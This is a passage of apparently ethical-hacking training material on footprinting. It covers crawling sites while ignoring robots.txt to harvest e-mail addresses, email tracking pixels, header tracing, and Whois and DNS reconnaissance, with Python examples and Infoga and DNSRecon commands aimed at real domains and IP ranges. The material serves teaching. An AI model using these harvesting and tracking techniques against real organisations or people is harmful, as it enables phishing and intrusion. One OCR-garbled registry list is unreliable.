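EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
WORD_RE = re.compile(r"[A-Za-z]{3,}")


def disallowed_paths(base):
    """Disallow entries from /robots.txt (empty list when there is no file)."""
    body = fetch(urljoin(base, "/robots.txt")) or ""
    paths = []
    for line in body.splitlines():
        if line.lower().startswith("disallow:"):
            value = line.split(":", 1)[1].strip()
            if value:
                paths.append(value)
    return paths


def spider(start, obey_robots=True, max_pages=50):
    parts = urlsplit(start)
    base = f"{parts.scheme}://{parts.netloc}"
    blocked = disallowed_paths(base)
    found = {"pages": [], "resources": set(), "external": set(), "comments": [],
             "emails": set(), "words": Counter(), "robots": blocked}
    seen, queue = set(), deque([start])
    while queue and len(found["pages"]) < max_pages:
        url = queue.popleft()
        if url in seen:
            continue
        seen.add(url)
        if obey_robots and any(urlsplit(url).path.startswith(p) for p in blocked):
            continue
        body = fetch(url)
        if body is None:
            continue
        found["pages"].append(url)
        page = PageParser()
        page.feed(body)
        text = " ".join(page.text)
        found["comments"].extend(page.comments)
        found["emails"].update(EMAIL_RE.findall(text + " " + " ".join(page.comments)))
        found["words"].update(WORD_RE.findall(text))
        for tag, src in page.resources:
            found["resources"].add((tag, urljoin(url, src)))
        for href in page.links:
            nxt = urljoin(url, href).split("#", 1)[0]
            if nxt.startswith(base):
                queue.append(nxt)
            else:
                found["external"].add(nxt)   # off-site link: recorded, not crawled
    return found


def wordlist(found, min_len=5):
    """Most frequent words first, like `cewl -m <min_len>`."""
    return [w for w, _ in found["words"].most_common() if len(w) >= min_len]


if __name__ == "__main__":
    result = spider("https://www.example.test/", obey_robots=False)
    print(len(result["pages"]), "pages; e-mails:", sorted(result["emails"]))
    print("wordlist:", wordlist(result)[:10])
```

Run with the default obey_robots=True, the /admin/ page is never fetched and its comment naming an internal database host never appears; with obey_robots=False it does, which is exactly why a robots.txt Disallow list is a footprinting lead rather than a protection.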

Extracting Metadata of Public Documents

Useful information may reside on the target organization's website in the form of pdf documents, Microsoft Word files, and other files in various formats. Attackers extract valuable data, including metadata and hidden information, from such documents. The data mainly contains hidden information about the public documents that can be analyzed to extract information such as the title of the page, description, keywords, creation/modification date and time of the content, and usernames and e-mail addresses of employees of the target organization.

An attacker can misuse this information to perform malicious activities against the target organization by brute-forcing authentication using the usernames and e-mail addresses of employees, or perform social engineering to send malware, which can infect the target system.

Metadata Extraction Tools

Metadata extraction tools such as Metagoofil, Exiftool, and Web Data Extractor automatically extract critical information that includes the usernames of clients, operating systems (exploits are OS-specific), email addresses (possibly for social engineering), list of software (version and type) used, list of servers, document creation/modification date, and authors of the website.

▪ Metagoofil
  Source: https://code.google.com
  Metagoofil extracts metadata of public documents (pdf, doc, xls, ppt, docx, pptx, and xlsx) belonging to a target company. It performs a Google search to identify and download the documents to the local disk and then extracts the metadata with different libraries such as Hachoir, PdfMiner, and others.

  As shown in the screenshot, Metagoofil generates a report with usernames, software versions, and servers or machine names, which helps attackers in the information gathering phase.

Figure 2.53: Screenshot of Metagoofil (searching for doc and pdf files with a limit of 200 results and downloading the first 50)

Other Techniques for Website Footprinting

▪ Monitoring Web Pages for Updates and Changes
  Attackers monitor the target website to detect web updates and changes. Monitoring the target website helps the attackers to access and identify password-protected pages, track changes in the login pages, extract changes in the software version and driver updates, extract and store images on the modified web pages, and so on. Attackers analyze the gathered information to detect underlying vulnerabilities in the target website, and based on these vulnerabilities, they perform exploitation of the target web application.

  Web Updates Monitoring Tools
  Web updates monitoring tools are capable of detecting any changes or updates on a particular website, and they can send notifications or alerts to interested users through email or SMS.

  o WebSite-Watcher
    Source: https://www.aignes.com
    WebSite-Watcher helps to track websites for updates and automatic changes. When an update or change occurs, WebSite-Watcher automatically detects and saves the last two versions onto your disk. As shown in the screenshot, attackers use WebSite-Watcher to extract the older and newer versions of web pages related to the target website.

Figure 2.54: Screenshot of WebSite-Watcher
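The following Python example is added as an illustration and is not part of the courseware or of WebSite-Watcher. It shows the mechanism behind "detect a change and keep the last two versions": hash a normalised copy of each fetched page, compare it with the stored one, and report the differing lines. The normalisation step is the part a monitor cannot skip, because CSRF tokens, rendered timestamps and cache-busting query strings differ on every fetch and would otherwise raise an alert on every poll. The login-page snapshots, the URL and the volatile-content patterns are constructed; in use, the page would be fetched on a schedule and each body passed to PageMonitor.check().

```python
"""Web-page change monitoring: keep the last two versions of each page and report
what changed, after normalising content that differs on every fetch.

The three snapshots are constructed; in use, fetch the page on a schedule and
pass each body to PageMonitor.check().
"""
import difflib
import hashlib
import re

# Content expected to differ between fetches (assumption: extend per target).
VOLATILE = [
    (re.compile(r'name="csrf_token" value="[^"]*"'), 'name="csrf_token" value="<token>"'),
    (re.compile(r"\b\d{4}-\d{2}-\d{2}[T ]\d{2}:\d{2}(?::\d{2})?\b"), "<timestamp>"),
    (re.compile(r"\?(?:v|ver|cb)=[0-9A-Za-z]+"), "?v=<cachebust>"),
]


def normalise(html: str) -> str:
    for pattern, replacement in VOLATILE:
        html = pattern.sub(replacement, html)
    return "\n".join(line.strip() for line in html.splitlines() if line.strip())


class PageMonitor:
    def __init__(self):
        self.versions = {}   # url -> [(sha256, normalised body)], the last two only

    def check(self, url: str, html: str):
        """None when the page is unchanged; otherwise a record with the differing lines."""
        body = normalise(html)
        digest = hashlib.sha256(body.encode()).hexdigest()
        history = self.versions.setdefault(url, [])
        if history and history[-1][0] == digest:
            return None
        changed = []
        if history:
            diff = difflib.unified_diff(history[-1][1].splitlines(), body.splitlines(),
                                        "previous", "current", lineterm="")
            changed = [l for l in diff
                       if l.startswith(("+", "-")) and not l.startswith(("+++", "---"))]
        history.append((digest, body))
        del history[:-2]                    # keep the older and the newer version only
        return {"url": url, "sha256": digest, "first": len(history) == 1, "changed_lines": changed}


# Constructed snapshots of a login page (not a real site).
URL = "https://www.example.test/login.php"
SNAPSHOT_1 = """<html><body>
<form action="/login.php"><input type="hidden" name="csrf_token" value="a1b2c3d4"></form>
<p>Generated 2020-07-06 10:15:00</p>
<script src="/static/app.js?v=3f9a"></script>
<footer>Portal v2.1.0</footer>
</body></html>"""
# Same page five minutes later: new token, new timestamp, new cache-buster, nothing real changed.
SNAPSHOT_2 = (SNAPSHOT_1.replace("a1b2c3d4", "e5f6a7b8")
              .replace("10:15:00", "10:20:00").replace("v=3f9a", "v=4c1d"))
# A real change: new software version and a new reset link.
SNAPSHOT_3 = SNAPSHOT_2.replace(
    "<footer>Portal v2.1.0</footer>",
    '<a href="/admin/reset.php">Reset password</a>\n<footer>Portal v2.1.1</footer>')

if __name__ == "__main__":
    monitor = PageMonitor()
    for snapshot in (SNAPSHOT_1, SNAPSHOT_2, SNAPSHOT_3):
        print(monitor.check(URL, snapshot))
```

The second snapshot produces no alert even though its raw bytes differ from the first; the third reports exactly the version bump and the new path, which are the two kinds of change the monitoring passage above is interested in.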

▪ Searching for Contact Information, Email Addresses, and Telephone Numbers from Company Website
  Attackers can search the target company's website to gather crucial information about the company. Generally, organizations use websites to inform the public about what they do, what type of services or products they provide, how to contact them, etc. Attackers can exploit this information to launch further attacks on the target company. For example, attackers can search for the following information on the company's website:
  o Company contact names, phone numbers, and email addresses
  o Company locations and branches
  o Partner information
  o News
  o Links to other sites
  o Product, project, or service data

▪ Searching for Web Pages Posting Patterns and Revision Numbers
  Copyright is a protecting mechanism provided by the law of a country, which grants the creator of an original work exclusive rights for its use and distribution. To restrict third parties from accessing their data freely, most organizations ensure that there is a copyright notice on every single piece of their published work. A typical copyright notice contains the following information:
  o The copyright symbol ©
  o The year of creation
  o The name of the author
  o A rights statement
  An attacker can search for copyright notices on the web and use these details to perform a deep analysis of the target organization. Further, attackers can search and note down the revision number of a product. The revision number is a unique string that acts as an identifier for the revision of a given document, and it can be found within the documents of the company. Attackers can also search for the document numbers that are assigned to the documents after revision, which can be searched from the Internet and recorded to launch further attacks on the target.

▪ Monitoring Website Traffic of Target Company
  Attackers can monitor a target company's website traffic using tools such as Web-Stat, Alexa, and Monitis to collect valuable information about the target's customer base. These tools help collect information about the target's customers, which helps attackers to disguise themselves as customers and launch social engineering attacks on the target.
  The information collected includes:
  o Total visitors: Tools such as Clicky (https://clicky.com) find the total number of visitors browsing the target website.
  o Page views: Tools such as Opentracker (https://www.opentracker.net) monitor the total number of pages viewed by the users along with the timestamps and the status of the user on a particular web page (whether the web page is still active or closed).
  o Bounce rate: Tools such as Google Analytics (https://analytics.google.com) measure the bounce rate of the target company's website.
  o Live visitors map: Tools such as Web-Stat (https://www.web-stat.com) track the geographical location of the users visiting the company's website.
  o Site ranking: Tools such as Alexa (https://www.alexa.com) track a company's rank on the web.
  o Audience geography: Tools such as Alexa track a company's customer locations on the globe.
  o Track visitors and monitor sales: Tools such as goingup! (https://goingup.com) track visitors, monitor sales, and show conversion rates for the company's website.

Figure 2.55: Screenshot of Alexa

Email Footprinting

So far, we have discussed footprinting through search engines, footprinting using Google, footprinting through social networking sites, and website footprinting. Now, we will discuss email footprinting. This section describes how to track email communications, how to collect information from email headers, and email tracking tools.

Tracking Email Communications

Email tracking monitors the email messages of a particular user. This kind of tracking is possible through digitally time-stamped records that reveal the time and date when the target receives and opens a specific email. Email tracking tools allow an attacker to collect information such as IP addresses, mail servers, and service providers involved in sending the email. Attackers can use this information to build a hacking strategy and to perform social engineering and other attacks. Examples of email tracking tools include eMailTrackerPro, Infoga, and Mailtrack.

Information about the victim gathered using email tracking tools includes:

▪ Recipient's system IP address: Allows tracking of the recipient's IP address
▪ Geolocation: Estimates and displays the location of the recipient on the map and may even calculate the distance from the attacker's location
▪ Email received and read: Notifies the attacker when the email is received and read by the recipient
▪ Read duration: The time spent by the recipient in reading the email sent by the sender
▪ Proxy detection: Provides information about the type of server used by the recipient
▪ Links: Checks whether the links sent to the recipient through email have been checked
▪ Operating system and browser information: Reveals information about the operating system and the browser used by the recipient. The attacker can use this information to find loopholes in that version of the operating system and browser to launch further attacks
▪ Forward email: Determines whether the email sent to the user is forwarded to another person
▪ Device type: Provides information about the type of device used to open and read the email, e.g., desktop computer, mobile device, or laptop
▪ Path travelled: Tracks the path through which the email traveled via email transfer agents from the source to the destination system
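The following Python example is added as an illustration and is not part of the courseware or of any tracking product named above. It shows where the time-stamped "received and read" records in the list above come from: each recipient gets a unique one-pixel image URL whose tag is an HMAC of the campaign and the address, so a tag cannot be guessed or forged to pollute the data; when the recipient's mail client loads the image, the tracking server's access log records the open time, the client IP and the User-Agent, from which the device type is inferred. The server secret, host names, recipients and log lines are constructed (the Gmail proxy User-Agent is the form that proxy is known to send, included as an assumption), and classify_ua() handles the caveat that image-proxying clients report the proxy's address rather than the recipient's.

```python
"""Tracking pixel: generating per-recipient pixel URLs and reading opens back
from the web server's access log. All hosts, addresses and log lines are
constructed.
"""
import hashlib
import hmac
import re
from datetime import datetime, timezone

SECRET = b"server-side-key-rotate-me"   # assumed; lives only on the tracking server


def pixel_url(base: str, campaign: str, recipient: str) -> str:
    """Unique, unforgeable pixel URL for one recipient of one campaign."""
    tag = hmac.new(SECRET, f"{campaign}:{recipient}".encode(), hashlib.sha256).hexdigest()[:16]
    return f"{base}/o/{campaign}/{tag}.gif"


def pixel_html(url: str) -> str:
    """1x1 image tag embedded in the HTML mail body."""
    return f'<img src="{url}" width="1" height="1" alt="">'


LOG_RE = re.compile(   # Apache/nginx "combined" log format
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET (?P<path>\S+) HTTP/\d\.\d" '
    r'(?P<status>\d{3}) \d+ "[^"]*" "(?P<ua>[^"]*)"$')


def classify_ua(ua: str) -> str:
    u = ua.lower()
    if "googleimageproxy" in u or "ggpht.com" in u:
        return "proxied (Gmail image proxy; real client hidden)"
    if "iphone" in u or "ipad" in u or "android" in u:
        return "mobile"
    if "windows" in u or "macintosh" in u or "x11" in u:
        return "desktop"
    return "unknown"


def opens_from_log(lines, base, campaign, recipients):
    """Match pixel hits in the access log back to recipients."""
    by_tag = {pixel_url(base, campaign, r).rsplit("/", 1)[1]: r for r in recipients}
    prefix = f"/o/{campaign}/"
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not m.group("path").startswith(prefix):
            continue
        who = by_tag.get(m.group("path").rsplit("/", 1)[1])
        if who is None:
            continue                    # unknown or forged tag: ignored
        opened = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        events.append({"recipient": who, "ip": m.group("ip"),
                       "opened_at": opened.astimezone(timezone.utc).isoformat(),
                       "client": classify_ua(m.group("ua"))})
    return events


# Constructed campaign and access-log lines.
BASE, CAMPAIGN = "https://track.example.test", "c1"
RECIPIENTS = ["bob@victim.test", "alice@victim.test", "carol@victim.test"]
_bob = pixel_url(BASE, CAMPAIGN, "bob@victim.test").rsplit("/", 1)[1]
_alice = pixel_url(BASE, CAMPAIGN, "alice@victim.test").rsplit("/", 1)[1]
SAMPLE_LOG = [
    f'203.0.113.9 - - [06/Jul/2020:10:17:42 +0000] "GET /o/c1/{_bob} HTTP/1.1" 200 43 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/83.0 Safari/537.36"',
    f'66.249.85.12 - - [06/Jul/2020:11:02:05 +0000] "GET /o/c1/{_alice} HTTP/1.1" 200 43 "-" '
    '"Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"',
    '198.51.100.7 - - [06/Jul/2020:11:05:00 +0000] "GET /o/c1/0000000000000000.gif HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.7 - - [06/Jul/2020:11:05:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    print(pixel_html(pixel_url(BASE, CAMPAIGN, "bob@victim.test")))
    for event in opens_from_log(SAMPLE_LOG, BASE, CAMPAIGN, RECIPIENTS):
        print(event)
```

Bob's open yields a usable IP and a desktop Windows client; Alice's open arrived through Gmail's image proxy, so the IP and User-Agent belong to Google and say nothing about her device, which is the limit of the "geolocation" and "device type" items listed above. Carol never loaded the image, so no record exists for her.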

Collecting Information from Email Header

An email header contains the details of the sender, routing information, addressing scheme, date, subject, and recipient. Email headers also help attackers trace the routing path taken by an email before it is delivered to the recipient. Each email header is a useful source of information for an attacker to launch attacks against the target. The process of viewing the email header varies with different email programs.

Commonly used email programs:

▪ eM Client
▪ Mailbird Lite
▪ Hiri
▪ Mozilla Thunderbird
▪ Spike
▪ Claws Mail
▪ SmarterMail Webmail
▪ Outlook

The email header contains the following information:

▪ Sender's mail server
▪ Date and time of receipt by the originator's email servers
▪ Authentication system used by the sender's mail server
▪ Date and time of sending the message
▪ A unique number assigned by mx.google.com to identify the message
▪ Sender's full name
▪ Sender's IP address and address from which the message was sent

The attacker can trace and collect all this information by performing a detailed analysis of the complete email header.

Figure 2.56: Screenshot showing detailed analysis of the email header (callouts mark the date and time received by the originator's email servers, the sender's mail server, the authentication system used by the sender's mail server, and the sender's full name)
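The following Python example is added as an illustration and is not part of the courseware. It performs the header analysis described above on a raw message: every mail transfer agent prepends its own Received: line, so reading them bottom-up gives the path from the originating client to the final server, the "from" part of the bottom line yields the sender's host and IP address, and the Message-ID, From: address and Authentication-Results verdicts are read directly. It also checks that the hop timestamps increase, since out-of-order times are a sign of a forged or tampered header. The message is a constructed phishing sample (none of the hosts or addresses are real); a real raw header can be pasted into analyze_headers() as-is.

```python
"""Email header analysis: walk the Received: chain to reconstruct the route,
and pull sender, Message-ID and authentication verdicts. The sample message
is constructed.
"""
import re
from email import message_from_string
from email.utils import parseaddr, parsedate_to_datetime

RECEIVED_RE = re.compile(r"from\s+(?P<frm>\S+)(?:\s+\((?P<extra>[^)]*)\))?\s+by\s+(?P<by>\S+)")
IP_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)")


def parse_received(value: str) -> dict:
    """One Received: header -> {from, from_ip, by, time}."""
    text = " ".join(value.split())          # unfold continuation lines
    hop = {"from": None, "from_ip": None, "by": None, "time": None}
    m = RECEIVED_RE.search(text)
    if m:
        hop["from"] = m.group("frm").strip("[]")
        ip = IP_RE.search(m.group("extra") or "") or IP_RE.search(m.group("frm"))
        hop["from_ip"] = ip.group(1) if ip else None   # address as seen by the receiving MTA
        hop["by"] = m.group("by")
    if ";" in text:
        try:
            hop["time"] = parsedate_to_datetime(text.rsplit(";", 1)[1].strip())
        except (TypeError, ValueError):
            pass
    return hop


def analyze_headers(raw: str) -> dict:
    msg = message_from_string(raw)
    hops = [parse_received(h) for h in reversed(msg.get_all("Received", []))]  # transit order
    times = [h["time"] for h in hops if h["time"]]
    sender = parseaddr(msg.get("From", ""))[1]
    auth = dict(AUTH_RE.findall(" ".join(msg.get_all("Authentication-Results", []))))
    return {
        "hops": hops,
        "origin_host": hops[0]["from"] if hops else None,
        "origin_ip": hops[0]["from_ip"] if hops else None,
        "final_server": hops[-1]["by"] if hops else None,
        "message_id": msg.get("Message-ID"),
        "from_addr": sender,
        "from_domain": sender.rpartition("@")[2],
        "auth": auth,
        "times_monotonic": all(a <= b for a, b in zip(times, times[1:])),
    }


# Constructed raw message (no real hosts; tabs fold the long headers).
SAMPLE_RAW = """Received: from mx.victim.test (mx.victim.test [203.0.113.10])
\tby mail.victim.test with ESMTP id 7Kq3;
\tMon, 6 Jul 2020 10:15:06 +0000
Received: from smtp.attacker.test (smtp.attacker.test [198.51.100.25])
\tby mx.victim.test with ESMTPS id ab12 for <bob@victim.test>;
\tMon, 6 Jul 2020 10:15:04 +0000
Received: from [192.168.1.23] (unknown [198.51.100.77])
\tby smtp.attacker.test with ESMTPSA id x9;
\tMon, 6 Jul 2020 10:15:01 +0000
Authentication-Results: mx.victim.test; spf=pass smtp.mailfrom=attacker.test;
\tdkim=none; dmarc=none
Message-ID: <20200706101500.1234@smtp.attacker.test>
From: "IT Helpdesk" <helpdesk@attacker.test>
To: bob@victim.test
Date: Mon, 6 Jul 2020 10:15:00 +0000
Subject: Password expiry notice

Please reset your password at the link below.
"""

if __name__ == "__main__":
    report = analyze_headers(SAMPLE_RAW)
    for hop in report["hops"]:
        print(f"{hop['from']} [{hop['from_ip']}] -> {hop['by']} at {hop['time']}")
    print({k: v for k, v in report.items() if k != "hops"})
```

In the sample the first hop shows a private address (192.168.1.23) submitting through smtp.attacker.test from the public address 198.51.100.77, and the From: domain matches the submitting server, so nothing is spoofed at the transport level even though the display name impersonates a helpdesk; the Received: lines added by the recipient's own servers are the only ones that cannot have been written by the sender.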

Email Tracking Tools

Email tracking tools allow an attacker to track an email and extract information such as sender identity, mail server, sender's IP address, location, and so on. These tools send notifications automatically when the recipients open the mail and provide status information about whether the email was successfully delivered or not. Attackers use the extracted information to attack the target organization's systems by sending malicious emails.

▪ Infoga
  Source: https://github.com
  Infoga is a tool used for gathering email account information (IP, hostname, country, etc.) from different public sources (search engines, PGP key servers, and Shodan), and it checks if an email was leaked using the haveibeenpwned.com API. For example, the command

      python infoga.py --domain microsoft.com --source all --breach -v 2 --report ../microsoft.txt

  will retrieve all the publicly available email addresses related to the domain microsoft.com along with email account information.

      python infoga.py --info m4110k@protonmail.com --breach -v 3 --report ../m4110k.txt

  The above command will retrieve email account information for a specified email address.

▪ eMailTrackerPro
  Source: http://www.emailtrackerpro.com
  As shown in the screenshot, attackers use eMailTrackerPro to analyze email headers and extract information such as the sender's geographical location, IP address, and so on. It allows an attacker to review the traces later by saving past traces.

Figure 2.58: Screenshot of eMailTrackerPro

Whois Footprinting

Gathering network-related information such as "Whois" information about the target organization is important when planning an attack. In this section, we will discuss Whois footprinting, which helps in gathering domain information such as information regarding the owner of an organization, its registrar, registration details, its name server, and contact information. Whois footprinting focuses on how to perform a Whois lookup, analyze the Whois lookup results, and find IP geolocation information, as well as the tools used to gather Whois information.
Whois Lookup

Whois is a query and response protocol used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. This protocol listens to requests on port 43 (TCP). Regional Internet Registries (RIRs) maintain the Whois databases for IP address blocks and autonomous system numbers, while domain name registries and registrars maintain the Whois records for domain names, which contain the contact information of domain owners. For each resource, the Whois database provides text records with information about the resource itself and relevant information regarding assignees, registrants, and administrative information (creation and expiration dates). Note that since 2018 many registrars redact registrant contact details for privacy reasons, so those fields may hold a placeholder such as "REDACTED FOR PRIVACY" rather than personal data.

Two types of data models exist to store and look up Whois information:

▪ Thick Whois - Stores the complete Whois information from all the registrars for a particular set of data.
▪ Thin Whois - Stores only the name of the Whois server of the registrar of a domain, which in turn holds complete details on the data being looked up.

A Whois query returns the following information:

▪ Domain name details
▪ Contact details of the domain owner
▪ Domain name servers
▪ NetRange
▪ When a domain has been created
▪ Expiry records
▪ Records last updated

An attacker queries a Whois database server to obtain information about the target domain name, contact details of its owner, expiry date, creation date, and so on, and the Whois server responds to the query with the requested information. Using this information, an attacker can create a map of the organization's network, mislead domain owners with social engineering, and then obtain internal details of the network.

Regional Internet Registries (RIRs)

TheRIRsinclude:
=
ARIN(American
Registry (https://www.arin.net)
for InternetNumbers)
=
NetworkInformationCenter)
(African
AFRINIC (https://www.afrinic.net)
=
Pacific
APNIC(Asia NetworkInformation (https://www.apnic.net)
Center)
RIPE(Réseaux NetworkCoordinationCentre)
IPEuropéens (https://www.ripe.net)
LACNIC(Latin and
American Caribbean
Network I Center)
nformation
(https://www.lacnic.net)
ical andCountermensores
Mackin ©by E-Comel
Copyright
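The protocol exchange and the record fields described above, as an added example written for this page (it is not code from the CEH courseware or from any Whois tool): it builds the query bytes a client sends on TCP port 43, parses a constructed registry response, and distinguishes the thin model (the answer names the registrar's Whois server, which holds the full record) from the thick one. Only the domain CertifiedHacker.com is taken from the page; every field value in the sample response, the server names and the registrar name are constructed placeholders.

```python
"""Whois (RFC 3912) query construction and response parsing.

Added example for this page; it is not code from the CEH courseware or from
any Whois tool. The protocol is line oriented: the client opens TCP port 43,
sends the query followed by CRLF, and the server answers with free-form text.
SAMPLE_RESPONSE below is CONSTRUCTED to look like a registry answer, so the
parser can run offline.
"""
import re
import socket
from datetime import datetime, timezone

WHOIS_PORT = 43


def build_query(name: str) -> bytes:
    """Encode a query as it goes on the wire: ASCII name plus CRLF.

    Internationalized domain names (IDNs) are converted to their A-label
    (punycode) form first, which is what Whois servers expect.
    """
    ascii_name = name.strip().encode("idna").decode("ascii")
    if not re.fullmatch(r"[A-Za-z0-9.:/-]+", ascii_name):
        raise ValueError(f"unexpected characters in query: {name!r}")
    return (ascii_name + "\r\n").encode("ascii")


def query_server(server: str, name: str, timeout: float = 10.0) -> str:
    """Live lookup against a Whois server (not exercised offline)."""
    with socket.create_connection((server, WHOIS_PORT), timeout=timeout) as sock:
        sock.sendall(build_query(name))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


# Constructed sample: registry-style answer for the domain shown in Figure 2.59.
SAMPLE_RESPONSE = """\
   Domain Name: CERTIFIEDHACKER.COM
   Registrar WHOIS Server: whois.example-registrar.test
   Registrar URL: http://www.example-registrar.test
   Updated Date: 2019-11-05T08:12:44Z
   Creation Date: 2001-02-09T18:03:51Z
   Registry Expiry Date: 2025-02-09T18:03:51Z
   Registrar: Example Registrar, Inc.
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Name Server: NS1.EXAMPLE-DNS.TEST
   Name Server: NS2.EXAMPLE-DNS.TEST
   DNSSEC: unsigned
>>> Last update of whois database: 2020-01-10T10:00:00Z <<<
"""


def parse_whois(text: str) -> dict:
    """Turn 'Key: Value' lines into a dict; repeated keys (name servers) become lists."""
    record: dict = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(">>>") or ":" not in line:
            continue
        key, value = line.split(":", 1)
        key, value = key.strip().lower(), value.strip()
        if key in record:
            if not isinstance(record[key], list):
                record[key] = [record[key]]
            record[key].append(value)
        else:
            record[key] = value
    return record


def summarize(text: str, today: str = None) -> dict:
    """Pull out the fields the text lists as a Whois query's result.

    `today` is an ISO date (YYYY-MM-DD) used for the expiry countdown so the
    result is reproducible; it defaults to the current UTC date.
    """
    rec = parse_whois(text)
    name_servers = rec.get("name server", [])
    if isinstance(name_servers, str):
        name_servers = [name_servers]
    expiry = datetime.strptime(rec["registry expiry date"], "%Y-%m-%dT%H:%M:%SZ")
    now = datetime.strptime(today, "%Y-%m-%d") if today else datetime.now(timezone.utc).replace(tzinfo=None)
    return {
        "domain": rec["domain name"].lower(),
        "registrar": rec.get("registrar"),
        "created": rec["creation date"],
        "expires": rec["registry expiry date"],
        "name_servers": [ns.lower() for ns in name_servers],
        # Thin model: the registry only names the registrar's server, and a
        # second query there returns the full record. Absent under a thick model.
        "referral": rec.get("registrar whois server"),
        "days_to_expiry": (expiry - now).days,
    }
```

summarize() is what a registrant would run against their own record to keep an eye on the expiry date (a lapsed registration is a takeover risk), and the referral field tells you whether a second query to the registrar's server is needed to see the complete record.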
Whois Lookup Result
Whois services such as http://whois.domaintools.com or https://www.tamos.com can help to perform Whois lookups. The screenshot shows the result analysis of a Whois lookup obtained with the two above-mentioned Whois services. The services perform a Whois lookup by entering the target's domain or IP address. The domaintools.com Whois service provides information such as registrant information, email, administrative contact information, creation and expiry date, and a list of domain servers. SmartWhois, available at http://www.tamos.com, gives information about an IP address, hostname, or domain, including the country, state or province, city, name of the network provider, administrator, phone number, fax number, and technical support contact information. It also helps in finding the owner of the domain, the owner's contact information, the owner of the IP address block, registered date of the domain, and so on. It supports Internationalized Domain Names (IDNs), which means one can query domain names that use non-English characters. It also supports IPv6 addresses.

Figure 2.59: Screenshot of Whois (Whois Record for CertifiedHacker.com)

Figure 2.60: Screenshot of SmartWhois

Attackers use Whois lookup tools such as Batch IP Converter, WhoisAnalyzer Pro, and ActiveWhois to extract information such as IP addresses, hostnames or domain names, registrant information, DNS records, including country, city, state, service providers, administrators, phone and fax numbers, and technical support information, for any IP address or domain name.
Finding IP Geolocation Information
IP geolocation helps to obtain information regarding a target such as its country, region/state, city, latitude and longitude of its city, ZIP/postal code, time zone, connection speed, ISP (hosting company), domain name, IDD country code, area code, weather station code and name, mobile carrier, and elevation.

Using the information obtained from IP geolocation, an attacker may attempt to gather more information about a target with the help of social engineering, surveillance, and non-technical attacks such as dumpster diving, hoaxing, or acting as a technical expert. With the help of the information obtained, an attacker can also set up a compromised web server near the victim's location, and if the exact location of the victim is detected, the attacker can perform malicious activities and infect the victim with malware designed for that specific area or gain unauthorized access to the target device or attempt to launch an attack using the target device.

IP geolocation lookup tools such as IP2Location, IP Location Finder, and IP Address Geographical Location Finder help to collect IP geolocation information about the target, which enables attackers to launch social engineering attacks such as spamming and phishing.

IP Geolocation Lookup Tools
- IP2Location
Source: https://www.ip2location.com
As shown in the screenshot, attackers use the IP2Location tool to identify a visitor's geographical location, i.e., country, region, city, latitude and longitude of city, ZIP code, time zone, connection speed, ISP, domain name, IDD country code, area code, weather station code and name, mobile carrier, elevation, and usage type information using a proprietary IP address lookup database and technology.

Figure 2.61: Screenshot of IP2Location
Extracting DNS Information

DNS Footprinting
After collecting Whois records about the target, the next phase in the footprinting methodology is DNS footprinting. Attackers perform DNS footprinting to gather information about DNS servers, DNS records, and types of servers used by the target organization. This information helps attackers to identify the hosts connected in the target network and perform further exploitation on the target organization. This section describes how to extract DNS information, perform the reverse DNS lookup, and collect information from DNS zone transfers, as well as DNS interrogation tools.

Extracting DNS Information
DNS footprinting reveals information about DNS zone data. DNS zone data include DNS domain names, computer names, IP addresses, and much more information about a network. An attacker uses DNS information to determine key hosts in the network and then performs social engineering attacks to gather even more information.

DNS footprinting helps in determining the following records about the target DNS:

Record Type   Description
A             Points to a host's IP address
MX            Points to domain's mail server
NS            Points to host's name server
CNAME         Canonical naming allows aliases to a host
SOA           Indicates authority for a domain
SRV           Service records
PTR           Maps IP address to a hostname
RP            Responsible person
HINFO         Host information record includes CPU type and OS
TXT           Unstructured text records
Table 2.7: DNS records and their description

DNS interrogation tools such as Professional Toolset (https://tools.dnsstuff.com) and DNS Records (https://network-tools.com) enable the user to perform DNS footprinting. DNSstuff (Professional Toolset) extracts DNS information about IP addresses, mail server extensions, DNS lookups, Whois lookups, and so on. It can extract a range of IP addresses using an IP routing lookup. If the target network allows unknown, unauthorized users to transfer DNS zone data, then it is easy for an attacker to obtain the information about DNS with the help of the DNS interrogation tool. When the attacker queries the DNS server using the DNS interrogation tool, the server responds with a record structure that contains information about the target DNS. DNS records provide important information about the location and types of servers.

Figure 2.62: Screenshot of Professional Toolset

Attackers also use DNS lookup tools such as DNSdumpster.com, Bluto, and Domain Dossier to retrieve DNS records for a specified domain or hostname. These tools retrieve information such as domains and IP addresses, domain Whois records, DNS records, and network Whois records.
Reverse DNS Lookup
DNS lookup is used for finding the IP addresses for a given domain name, and the reverse DNS operation is performed to obtain the domain name of a given IP address. When you are looking for a domain and type the domain name in the browser, the DNS converts that domain name into an IP address and forwards the request for further processing. This conversion of a domain name into an IP address is performed by a record. Attackers perform a reverse DNS lookup on the IP range to locate a DNS PTR record for such IP addresses.

Attackers use various tools such as DNSRecon and Reverse IP Domain Check for performing the reverse DNS lookup on the target host or a range of IP addresses. When we get an IP address, we can use these tools to obtain the domain name.

- DNSRecon
Source: https://github.com
As shown in the screenshot, attackers use the following command to perform a reverse DNS lookup on the target host:
dnsrecon -r 162.241.216.0-162.241.216.255
In the above command, the -r option specifies the range of IP addresses (first-last) for a reverse lookup by brute force.

Figure 2.63: Screenshot of DNSRecon showing reverse DNS lookup information

Attackers also find the other domains that share the same web server using tools such as Reverse IP Domain Check. These tools list the possible domains that are hosted on the same web server.

- Reverse IP Domain Check
